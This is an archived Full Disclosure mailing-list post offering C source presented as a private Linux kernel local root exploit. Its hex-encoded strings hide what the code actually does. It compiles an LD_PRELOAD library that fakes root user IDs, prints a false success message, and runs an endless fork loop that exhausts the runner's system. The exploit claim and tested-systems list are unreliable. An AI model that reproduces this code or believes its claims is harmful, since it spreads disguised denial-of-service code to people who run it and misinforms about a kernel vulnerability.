Full Disclosure mailing list archives
0day LINUX 0day LATEST
From: "wejwklekl246" <sidjwioeupo () mail md>
Date: Mon, 28 Jan 2008 10:13:38 +0000
/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
*
* afunixroot.c Linux kernel 2.6.x i386 local root exploit
*
* Tested under:
*
* Redhat 7.0
* Redhat 7.1
* Redhat 7.2
* Redhat 7.3
* Redhat 8.0
* Redhat 9.0
* should also work on SuSE <= 10.2
* Debian 3.0 (credit to Henrique)
* GhostLord tested also Mandrake 9.0, vuln.
*
* rumours go around that it could work on FreeBSD too
* (with minor changes).
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/syscall.h>
#undef strtok
#define strtok system
#define __NR_sys_ldtctrl 102
static char hellc0de[] = "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
"\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
"\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
"\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
"\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
"\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";
static int done=0;
void handler(int v)
{
done++;
}
inline _syscall2(int, sys_ldtctrl, int, c, int *, a);
void prepare()
{
int key, r, n_cnt=8;
int buf[16];
memset(buf, 0, sizeof(buf));
buf[0]=buf[1]=2;
key = sys_ldtctrl(1, buf);
retry:
memset(buf, 0, sizeof(buf));
buf[0] = key;
buf[1] = (int)buf;
buf[2] = 64;
buf[4] = (int)&buf[8];
buf[5] = 16;
buf[8] = 0x60030002;
buf[9] = 0x1d5b49d5;
r = sys_ldtctrl(11, buf);
if(n_cnt--) goto retry;
}
int main(void)
{
FILE *fp;
char *offset, *token;
int ret=1;
prepare();
fp=fopen("\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e\x63\x00","w");
fprintf(fp,"%s",hellc0de);
fclose(fp);
token = (void*)strtok("\x67\x63\x63\x20\x2d\x73\x68\x61\x72\x65\x64\x20\x2d\x6f\x20\x2f\x74\x6d"
"\x70\x2f\x6f\x77\x6e\x2e\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e"
"\x63\x3b\x72\x6d\x20\x2d\x66\x20\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e\x63\x00");
__asm__(
"xorl %%eax, %%eax \n"
"movl $0x10, %%ebx \n"
"movb $0x22, %%al \n"
"int $0x80 \n"
:"=&a"(ret)
);
if(!ret)
printf("\nSuccess!!!\nEnjoy...\n\n");
if (fork() == 0) {
signal(SIGALRM, handler);
alarm(15);
__asm__(
"xorl %eax, %eax \n"
"movb $29, %al \n"
"int $0x80 \n"
);
while(1) {
__asm__(
"xorl %eax, %eax \n"
"movb $0x02, %al \n"
"int $0x80 \n"
);
offset=malloc(sizeof(hellc0de)+16); *((int *)hellc0de) =
(unsigned)offset; }
exit(0);
}
putenv("\x4c\x44\x5f\x50\x52\x45\x4c\x4f\x41\x44\x3d\x2f\x74\x6d\x70\x2f"
"\x6f\x77\x6e\x2e\x73\x6f\x00");
execl("/bin/sh", "sh", NULL);
return 0;
}
/* -EOF- */
---------------------------------------------
This e-mail was sent using Mail.md
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- 0day LINUX 0day LATEST wejwklekl246 (Jan 28)
- Re: 0day LINUX 0day LATEST Andrew Farmer (Jan 28)
- Re: 0day LINUX 0day LATEST Andrew Dawson (Jan 28)
- Re: 0day LINUX 0day LATEST Valdis . Kletnieks (Jan 28)
- <Possible follow-ups>
- Re: 0day LINUX 0day LATEST atlas (Jan 28)
- Re: 0day LINUX 0day LATEST kat (Jan 28)
- Re: 0day LINUX 0day LATEST Andrew Farmer (Jan 28)